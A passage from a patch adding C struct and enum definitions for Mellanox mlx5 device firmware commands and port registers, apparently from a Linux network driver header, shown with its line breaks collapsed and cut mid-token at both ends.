pas[0][0x40]; +}; + +struct mlx5_ifc_create_psv_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 reserved_2[0x8]; + u8 psv0_index[0x18]; + + u8 reserved_3[0x8]; + u8 psv1_index[0x18]; + + u8 reserved_4[0x8]; + u8 psv2_index[0x18]; + + u8 reserved_5[0x8]; + u8 psv3_index[0x18]; +}; + +struct mlx5_ifc_create_psv_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 num_psv[0x4]; + u8 reserved_2[0x4]; + u8 pd[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_create_mkey_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 mkey_index[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_mkey_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 pg_access[0x1]; + u8 reserved_3[0x1f]; + + struct mlx5_ifc_mkc_bits memory_key_mkey_entry; + + u8 reserved_4[0x80]; + + u8 translations_octword_actual_size[0x20]; + + u8 reserved_5[0x560]; + + u8 klm_pas_mtt[0][0x20]; +}; + +struct mlx5_ifc_create_flow_table_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 table_id[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_flow_table_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x20]; + + u8 reserved_5[0x8]; + u8 level[0x8]; + u8 reserved_6[0x8]; + u8 log_size[0x8]; + + u8 reserved_7[0x120]; +}; + +struct mlx5_ifc_create_flow_group_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 group_id[0x18]; + + u8 reserved_2[0x20]; +}; + +enum { + MLX5_CREATE_FLOW_GROUP_IN_MATCH_CRITERIA_ENABLE_OUTER_HEADERS = 0x0, + MLX5_CREATE_FLOW_GROUP_IN_MATCH_CRITERIA_ENABLE_MISC_PARAMETERS = 0x1, + MLX5_CREATE_FLOW_GROUP_IN_MATCH_CRITERIA_ENABLE_INNER_HEADERS = 0x2, +}; + +struct mlx5_ifc_create_flow_group_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + u8 table_type[0x8]; + u8 reserved_3[0x18]; + + u8 reserved_4[0x8]; + u8 table_id[0x18]; + + u8 reserved_5[0x20]; + + u8 start_flow_index[0x20]; + + u8 reserved_6[0x20]; + + u8 end_flow_index[0x20]; + + u8 reserved_7[0xa0]; + + u8 reserved_8[0x18]; + u8 match_criteria_enable[0x8]; + + struct mlx5_ifc_fte_match_param_bits match_criteria; + + u8 reserved_9[0xe00]; +}; + +struct mlx5_ifc_create_eq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x18]; + u8 eq_number[0x8]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_eq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_eqc_bits eq_context_entry; + + u8 reserved_3[0x40]; + + u8 event_bitmask[0x40]; + + u8 reserved_4[0x580]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_create_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 dctn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_dctc_bits dct_context_entry; + + u8 reserved_3[0x180]; +}; + +struct mlx5_ifc_create_cq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 cqn[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_create_cq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; + + struct mlx5_ifc_cqc_bits cq_context; + + u8 reserved_3[0x600]; + + u8 pas[0][0x40]; +}; + +struct mlx5_ifc_config_int_moderation_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x4]; + u8 min_delay[0xc]; + u8 int_vector[0x10]; + + u8 reserved_2[0x20]; +}; + +enum { + MLX5_CONFIG_INT_MODERATION_IN_OP_MOD_WRITE = 0x0, + MLX5_CONFIG_INT_MODERATION_IN_OP_MOD_READ = 0x1, +}; + +struct mlx5_ifc_config_int_moderation_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x4]; + u8 min_delay[0xc]; + u8 int_vector[0x10]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_attach_to_mcg_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_attach_to_mcg_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 qpn[0x18]; + + u8 reserved_3[0x20]; + + u8 multicast_gid[16][0x8]; +}; + +struct mlx5_ifc_arm_xrc_srq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_ARM_XRC_SRQ_IN_OP_MOD_XRC_SRQ = 0x1, +}; + +struct mlx5_ifc_arm_xrc_srq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 xrc_srqn[0x18]; + + u8 reserved_3[0x10]; + u8 lwm[0x10]; +}; + +struct mlx5_ifc_arm_rq_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +enum { + MLX5_ARM_RQ_IN_OP_MOD_SRQ_ = 0x1, +}; + +struct mlx5_ifc_arm_rq_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 srq_number[0x18]; + + u8 reserved_3[0x10]; + u8 lwm[0x10]; +}; + +struct mlx5_ifc_arm_dct_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_arm_dct_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x8]; + u8 dct_number[0x18]; + + u8 reserved_3[0x20]; +}; + +struct mlx5_ifc_alloc_xrcd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 xrcd[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_xrcd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_uar_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 uar[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_uar_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_transport_domain_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 transport_domain[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_transport_domain_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_q_counter_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x18]; + u8 counter_set_id[0x8]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_q_counter_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_alloc_pd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x8]; + u8 pd[0x18]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_alloc_pd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_add_vxlan_udp_dport_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_add_vxlan_udp_dport_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x10]; + u8 vxlan_udp_port[0x10]; +}; + +struct mlx5_ifc_access_register_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 reserved_1[0x40]; + + u8 register_data[0][0x20]; +}; + +enum { + MLX5_ACCESS_REGISTER_IN_OP_MOD_WRITE = 0x0, + MLX5_ACCESS_REGISTER_IN_OP_MOD_READ = 0x1, +}; + +struct mlx5_ifc_access_register_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 reserved_2[0x10]; + u8 register_id[0x10]; + + u8 argument[0x20]; + + u8 register_data[0][0x20]; +}; + +struct mlx5_ifc_sltp_reg_bits { + u8 status[0x4]; + u8 version[0x4]; + u8 local_port[0x8]; + u8 pnat[0x2]; + u8 reserved_0[0x2]; + u8 lane[0x4]; + u8 reserved_1[0x8]; + + u8 reserved_2[0x20]; + + u8 reserved_3[0x7]; + u8 polarity[0x1]; + u8 ob_tap0[0x8]; + u8 ob_tap1[0x8]; + u8 ob_tap2[0x8]; + + u8 reserved_4[0xc]; + u8 ob_preemp_mode[0x4]; + u8 ob_reg[0x8]; + u8 ob_bias[0x8]; + + u8 reserved_5[0x20]; +}; + +struct mlx5_ifc_slrg_reg_bits { + u8 status[0x4]; + u8 version[0x4]; + u8 local_port[0x8]; + u8 pnat[0x2]; + u8 reserved_0[0x2]; + u8 lane[0x4]; + u8 reserved_1[0x8]; + + u8 time_to_link_up[0x10]; + u8 reserved_2[0xc]; + u8 grade_lane_speed[0x4]; + + u8 grade_version[0x8]; + u8 grade[0x18]; + + u8 reserved_3[0x4]; + u8 height_grade_type[0x4]; + u8 height_grade[0x18]; + + u8 height_dz[0x10]; + u8 height_dv[0x10]; + + u8 reserved_4[0x10]; + u8 height_sigma[0x10]; + + u8 reserved_5[0x20]; + + u8 reserved_6[0x4]; + u8 phase_grade_type[0x4]; + u8 phase_grade[0x18]; + + u8 reserved_7[0x8]; + u8 phase_eo_pos[0x8]; + u8 reserved_8[0x8]; + u8 phase_eo_neg[0x8]; + + u8 ffe_set_tested[0x10]; + u8 test_errors_per_lane[0x10]; +}; + +struct mlx5_ifc_pvlc_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x1c]; + u8 vl_hw_cap[0x4]; + + u8 reserved_3[0x1c]; + u8 vl_admin[0x4]; + + u8 reserved_4[0x1c]; + u8 vl_operational[0x4]; +}; + +struct mlx5_ifc_pude_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 reserved_0[0x4]; + u8 admin_status[0x4]; + u8 reserved_1[0x4]; + u8 oper_status[0x4]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_ptys_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0xd]; + u8 proto_mask[0x3]; + + u8 reserved_2[0x40]; + + u8 eth_proto_capability[0x20]; + + u8 ib_link_width_capability[0x10]; + u8 ib_proto_capability[0x10]; + + u8 reserved_3[0x20]; + + u8 eth_proto_admin[0x20]; + + u8 ib_link_width_admin[0x10]; + u8 ib_proto_admin[0x10]; + + u8 reserved_4[0x20]; + + u8 eth_proto_oper[0x20]; + + u8 ib_link_width_oper[0x10]; + u8 ib_proto_oper[0x10]; + + u8 reserved_5[0x20]; + + u8 eth_proto_lp_advertise[0x20]; + + u8 reserved_6[0x60]; +}; + +struct mlx5_ifc_ptas_reg_bits { + u8 reserved_0[0x20]; + + u8 algorithm_options[0x10]; + u8 reserved_1[0x4]; + u8 repetitions_mode[0x4]; + u8 num_of_repetitions[0x8]; + + u8 grade_version[0x8]; + u8 height_grade_type[0x4]; + u8 phase_grade_type[0x4]; + u8 height_grade_weight[0x8]; + u8 phase_grade_weight[0x8]; + + u8 gisim_measure_bits[0x10]; + u8 adaptive_tap_measure_bits[0x10]; + + u8 ber_bath_high_error_threshold[0x10]; + u8 ber_bath_mid_error_threshold[0x10]; + + u8 ber_bath_low_error_threshold[0x10]; + u8 one_ratio_high_threshold[0x10]; + + u8 one_ratio_high_mid_threshold[0x10]; + u8 one_ratio_low_mid_threshold[0x10]; + + u8 one_ratio_low_threshold[0x10]; + u8 ndeo_error_threshold[0x10]; + + u8 mixer_offset_step_size[0x10]; + u8 reserved_2[0x8]; + u8 mix90_phase_for_voltage_bath[0x8]; + + u8 mixer_offset_start[0x10]; + u8 mixer_offset_end[0x10]; + + u8 reserved_3[0x15]; + u8 ber_test_time[0xb]; +}; + +struct mlx5_ifc_pspa_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 sub_port[0x8]; + u8 reserved_0[0x8]; + + u8 reserved_1[0x20]; +}; + +struct mlx5_ifc_pqdr_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x5]; + u8 prio[0x3]; + u8 reserved_2[0x6]; + u8 mode[0x2]; + + u8 reserved_3[0x20]; + + u8 reserved_4[0x10]; + u8 min_threshold[0x10]; + + u8 reserved_5[0x10]; + u8 max_threshold[0x10]; + + u8 reserved_6[0x10]; + u8 mark_probability_denominator[0x10]; + + u8 reserved_7[0x60]; +}; + +struct mlx5_ifc_ppsc_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x1c]; + u8 wrps_admin[0x4]; + + u8 reserved_4[0x1c]; + u8 wrps_status[0x4]; + + u8 reserved_5[0x8]; + u8 up_threshold[0x8]; + u8 reserved_6[0x8]; + u8 down_threshold[0x8]; + + u8 reserved_7[0x20]; + + u8 reserved_8[0x1c]; + u8 srps_admin[0x4]; + + u8 reserved_9[0x1c]; + u8 srps_status[0x4]; + + u8 reserved_10[0x40]; +}; + +struct mlx5_ifc_pplr_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x8]; + u8 lb_cap[0x8]; + u8 reserved_3[0x8]; + u8 lb_en[0x8]; +}; + +struct mlx5_ifc_pplm_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x20]; + + u8 port_profile_mode[0x8]; + u8 static_port_profile[0x8]; + u8 active_port_profile[0x8]; + u8 reserved_3[0x8]; + + u8 retransmission_active[0x8]; + u8 fec_mode_active[0x18]; + + u8 reserved_4[0x20]; +}; + +struct mlx5_ifc_ppcnt_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 pnat[0x2]; + u8 reserved_0[0x8]; + u8 grp[0x6]; + + u8 clr[0x1]; + u8 reserved_1[0x1c]; + u8 prio_tc[0x3]; + + union mlx5_ifc_eth_cntrs_grp_data_layout_auto_bits counter_set; +}; + +struct mlx5_ifc_ppad_reg_bits { + u8 reserved_0[0x3]; + u8 single_mac[0x1]; + u8 reserved_1[0x4]; + u8 local_port[0x8]; + u8 mac_47_32[0x10]; + + u8 mac_31_0[0x20]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_pmtu_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 max_mtu[0x10]; + u8 reserved_2[0x10]; + + u8 admin_mtu[0x10]; + u8 reserved_3[0x10]; + + u8 oper_mtu[0x10]; + u8 reserved_4[0x10]; +}; + +struct mlx5_ifc_pmpr_reg_bits { + u8 reserved_0[0x8]; + u8 module[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x18]; + u8 attenuation_5g[0x8]; + + u8 reserved_3[0x18]; + u8 attenuation_7g[0x8]; + + u8 reserved_4[0x18]; + u8 attenuation_12g[0x8]; +}; + +struct mlx5_ifc_pmpe_reg_bits { + u8 reserved_0[0x8]; + u8 module[0x8]; + u8 reserved_1[0xc]; + u8 module_status[0x4]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_pmpc_reg_bits { + u8 module_state_updated[32][0x8]; +}; + +struct mlx5_ifc_pmlpn_reg_bits { + u8 reserved_0[0x4]; + u8 mlpn_status[0x4]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 e[0x1]; + u8 reserved_2[0x1f]; +}; + +struct mlx5_ifc_pmlp_reg_bits { + u8 rxtx[0x1]; + u8 reserved_0[0x7]; + u8 local_port[0x8]; + u8 reserved_1[0x8]; + u8 width[0x8]; + + u8 lane0_module_mapping[0x20]; + + u8 lane1_module_mapping[0x20]; + + u8 lane2_module_mapping[0x20]; + + u8 lane3_module_mapping[0x20]; + + u8 reserved_2[0x160]; +}; + +struct mlx5_ifc_pmaos_reg_bits { + u8 reserved_0[0x8]; + u8 module[0x8]; + u8 reserved_1[0x4]; + u8 admin_status[0x4]; + u8 reserved_2[0x4]; + u8 oper_status[0x4]; + + u8 ase[0x1]; + u8 ee[0x1]; + u8 reserved_3[0x1c]; + u8 e[0x2]; + + u8 reserved_4[0x40]; +}; + +struct mlx5_ifc_plpc_reg_bits { + u8 reserved_0[0x4]; + u8 profile_id[0xc]; + u8 reserved_1[0x4]; + u8 proto_mask[0x4]; + u8 reserved_2[0x8]; + + u8 reserved_3[0x10]; + u8 lane_speed[0x10]; + + u8 reserved_4[0x17]; + u8 lpbf[0x1]; + u8 fec_mode_policy[0x8]; + + u8 retransmission_capability[0x8]; + u8 fec_mode_capability[0x18]; + + u8 retransmission_support_admin[0x8]; + u8 fec_mode_support_admin[0x18]; + + u8 retransmission_request_admin[0x8]; + u8 fec_mode_request_admin[0x18]; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_plib_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x8]; + u8 ib_port[0x8]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_plbf_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0xd]; + u8 lbf_mode[0x3]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_pipg_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 dic[0x1]; + u8 reserved_2[0x19]; + u8 ipg[0x4]; + u8 reserved_3[0x2]; +}; + +struct mlx5_ifc_pifr_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0xe0]; + + u8 port_filter[8][0x20]; + + u8 port_filter_update_en[8][0x20]; +}; + +struct mlx5_ifc_pfcc_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 ppan[0x4]; + u8 reserved_2[0x4]; + u8 prio_mask_tx[0x8]; + u8 reserved_3[0x8]; + u8 prio_mask_rx[0x8]; + + u8 pptx[0x1]; + u8 aptx[0x1]; + u8 reserved_4[0x6]; + u8 pfctx[0x8]; + u8 reserved_5[0x10]; + + u8 pprx[0x1]; + u8 aprx[0x1]; + u8 reserved_6[0x6]; + u8 pfcrx[0x8]; + u8 reserved_7[0x10]; + + u8 reserved_8[0x80]; +}; + +struct mlx5_ifc_pelc_reg_bits { + u8 op[0x4]; + u8 reserved_0[0x4]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 op_admin[0x8]; + u8 op_capability[0x8]; + u8 op_request[0x8]; + u8 op_active[0x8]; + + u8 admin[0x40]; + + u8 capability[0x40]; + + u8 request[0x40]; + + u8 active[0x40]; + + u8 reserved_2[0x80]; +}; + +struct mlx5_ifc_peir_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0xc]; + u8 error_count[0x4]; + u8 reserved_3[0x10]; + + u8 reserved_4[0xc]; + u8 lane[0x4]; + u8 reserved_5[0x8]; + u8 error_type[0x8]; +}; + +struct mlx5_ifc_pcap_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 port_capability_mask[4][0x20]; +}; + +struct mlx5_ifc_paos_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 reserved_0[0x4]; + u8 admin_status[0x4]; + u8 reserved_1[0x4]; + u8 oper_status[0x4]; + + u8 ase[0x1]; + u8 ee[0x1]; + u8 reserved_2[0x1c]; + u8 e[0x2]; + + u8 reserved_3[0x40]; +}; + +struct mlx5_ifc_pamp_reg_bits { + u8 reserved_0[0x8]; + u8 opamp_group[0x8]; + u8 reserved_1[0xc]; + u8 opamp_group_type[0x4]; + + u8 start_index[0x10]; + u8 reserved_2[0x4]; + u8 num_of_indices[0xc]; + + u8 index_data[18][0x10]; +}; + +struct mlx5_ifc_lane_2_module_mapping_bits { + u8 reserved_0[0x6]; + u8 rx_lane[0x2]; + u8 reserved_1[0x6]; + u8 tx_lane[0x2]; + u8 reserved_2[0x8]; + u8 module[0x8]; +}; + +struct mlx5_ifc_bufferx_reg_bits { + u8 reserved_0[0x6]; + u8 lossy[0x1]; + u8 epsb[0x1]; + u8 reserved_1[0xc]; + u8 size[0xc]; + + u8 xoff_threshold[0x10]; + u8 xon_threshold[0x10]; +}; + +struct mlx5_ifc_set_node_in_bits { + u8 node_description[64][0x8]; +}; + +struct mlx5_ifc_register_power_settings_bits { + u8 reserved_0[0x18]; + u8 power_settings_level[0x8]; + + u8 reserved_1[0x60]; +}; + +struct mlx5_ifc_register_host_endianness_bits { + u8 he[0x1]; + u8 reserved_0[0x1f]; + + u8 reserved_1[0x60]; +}; + +struct mlx5_ifc_umr_pointer_desc_argument_bits { + u8 reserved_0[0x20]; + + u8 mkey[0x20]; + + u8 addressh_63_32[0x20]; + + u8 addressl_31_0[0x20]; +}; + +struct mlx5_ifc_ud_adrs_vector_bits { + u8 dc_key[0x40]; + + u8 ext[0x1]; + u8 reserved_0[0x7]; + u8 destination_qp_dct[0x18]; + + u8 static_rate[0x4]; + u8 sl_eth_prio[0x4]; + u8 fl[0x1]; + u8 mlid[0x7]; + u8 rlid_udp_sport[0x10]; + + u8 reserved_1[0x20]; + + u8 rmac_47_16[0x20]; + + u8 rmac_15_0[0x10]; + u8 tclass[0x8]; + u8 hop_limit[0x8]; + + u8 reserved_2[0x1]; + u8 grh[0x1]; + u8 reserved_3[0x2]; + u8 src_addr_index[0x8]; + u8 flow_label[0x14]; + + u8 rgid_rip[16][0x8]; +}; + +struct mlx5_ifc_pages_req_event_bits { + u8 reserved_0[0x10]; + u8 function_id[0x10]; + + u8 num_pages[0x20]; + + u8 reserved_1[0xa0]; +}; + +struct mlx5_ifc_eqe_bits { + u8 reserved_0[0x8]; + u8 event_type[0x8]; + u8 reserved_1[0x8]; + u8 event_sub_type[0x8]; + + u8 reserved_2[0xe0]; + + union mlx5_ifc_event_auto_bits event_data; + + u8 reserved_3[0x10]; + u8 signature[0x8]; + u8 reserved_4[0x7]; + u8 owner[0x1]; +}; + +enum { + MLX5_CMD_QUEUE_ENTRY_TYPE_PCIE_CMD_IF_TRANSPORT = 0x7, +}; + +struct mlx5_ifc_cmd_queue_entry_bits { + u8 type[0x8]; + u8 reserved_0[0x18]; + + u8 input_length[0x20]; + + u8 input_mailbox_pointer_63_32[0x20]; + + u8 input_mailbox_pointer_31_9[0x17]; + u8 reserved_1[0x9]; + + u8 command_input_inline_data[16][0x8]; + + u8 command_output_inline_data[16][0x8]; + + u8 output_mailbox_pointer_63_32[0x20]; + + u8 output_mailbox_pointer_31_9[0x17]; + u8 reserved_2[0x9]; + + u8 output_length[0x20]; + + u8 token[0x8]; + u8 signature[0x8]; + u8 reserved_3[0x8]; + u8 status[0x7]; + u8 ownership[0x1]; +}; + +struct mlx5_ifc_cmd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 command_output[0x20]; +}; + +struct mlx5_ifc_cmd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 command[0][0x20]; +}; + +struct mlx5_ifc_cmd_if_box_bits { + u8 mailbox_data[512][0x8]; + + u8 reserved_0[0x180]; + + u8 next_pointer_63_32[0x20]; + + u8 next_pointer_31_10[0x16]; + u8 reserved_1[0xa]; + + u8 block_number[0x20]; + + u8 reserved_2[0x8]; + u8 token[0x8]; + u8 ctrl_signature[0x8]; + u8 signature[0x8]; +}; + +struct mlx5_ifc_mtt_bits { + u8 ptag_63_32[0x20]; + + u8 ptag_31_8[0x18]; + u8 reserved_0[0x6]; + u8 wr_en[0x1]; + u8 rd_en[0x1]; +}; + +enum { + MLX5_INITIAL_SEG_NIC_INTERFACE_FULL_DRIVER = 0x0, + MLX5_INITIAL_SEG_NIC_INTERFACE_DISABLED = 0x1, + MLX5_INITIAL_SEG_NIC_INTERFACE_NO_DRAM_NIC = 0x2, +}; + +enum { + MLX5_INITIAL_SEG_NIC_INTERFACE_SUPPORTED_FULL_DRIVER = 0x0, + MLX5_INITIAL_SEG_NIC_INTERFACE_SUPPORTED_DISABLED = 0x1, + MLX5_INITIAL_SEG_NIC_INTERFACE_SUPPORTED_NO_DRAM_NIC = 0x2, +}; + +enum { + MLX5_INITIAL_SEG_HEALTH_SYNDROME_FW_INTERNAL_ERR = 0x1, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_DEAD_IRISC = 0x7, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_HW_FATAL_ERR = 0x8, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_FW_CRC_ERR = 0x9, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_ICM_FETCH_PCI_ERR = 0xa, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_ICM_PAGE_ERR = 0xb, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_ASYNCHRONOUS_EQ_BUF_OVERRUN = 0xc, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_EQ_IN_ERR = 0xd, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_EQ_INV = 0xe, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_FFSER_ERR = 0xf, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_HIGH_TEMP_ERR = 0x10, +}; + +struct mlx5_ifc_initial_seg_bits { + u8 fw_rev_minor[0x10]; + u8 fw_rev_major[0x10]; + + u8 cmd_interface_rev[0x10]; + u8 fw_rev_subminor[0x10]; + + u8 reserved_0[0x40]; + + u8 cmdq_phy_addr_63_32[0x20]; + + u8 cmdq_phy_addr_31_12[0x14]; + u8 reserved_1[0x2]; + u8 nic_interface[0x2]; + u8 log_cmdq_size[0x4]; + u8 log_cmdq_stride[0x4]; + + u8 command_doorbell_vector[0x20]; + + u8 reserved_2[0xf00]; + + u8 initializing[0x1]; + u8 reserved_3[0x4]; + u8 nic_interface_supported[0x3]; + u8 reserved_4[0x18]; + + struct mlx5_ifc_health_buffer_bits health_buffer; + + u8 no_dram_nic_offset[0x20]; + + u8 reserved_5[0x6e40]; + + u8 reserved_6[0x1f]; + u8 clear_int[0x1]; + + u8 health_syndrome[0x8]; + u8 health_counter[0x18]; + + u8 reserved_7[0x17fc0]; +}; + +union mlx5_ifc_ports_control_registers_document_bits { + struct mlx5_ifc_bufferx_reg_bits bufferx_reg; + struct mlx5_ifc_eth_2819_cntrs_grp_data_layout_bits eth_2819_cntrs_grp_data_layout; + struct mlx5_ifc_eth_2863_cntrs_grp_data_layout_bits eth_2863_cntrs_grp_data_layout; + struct 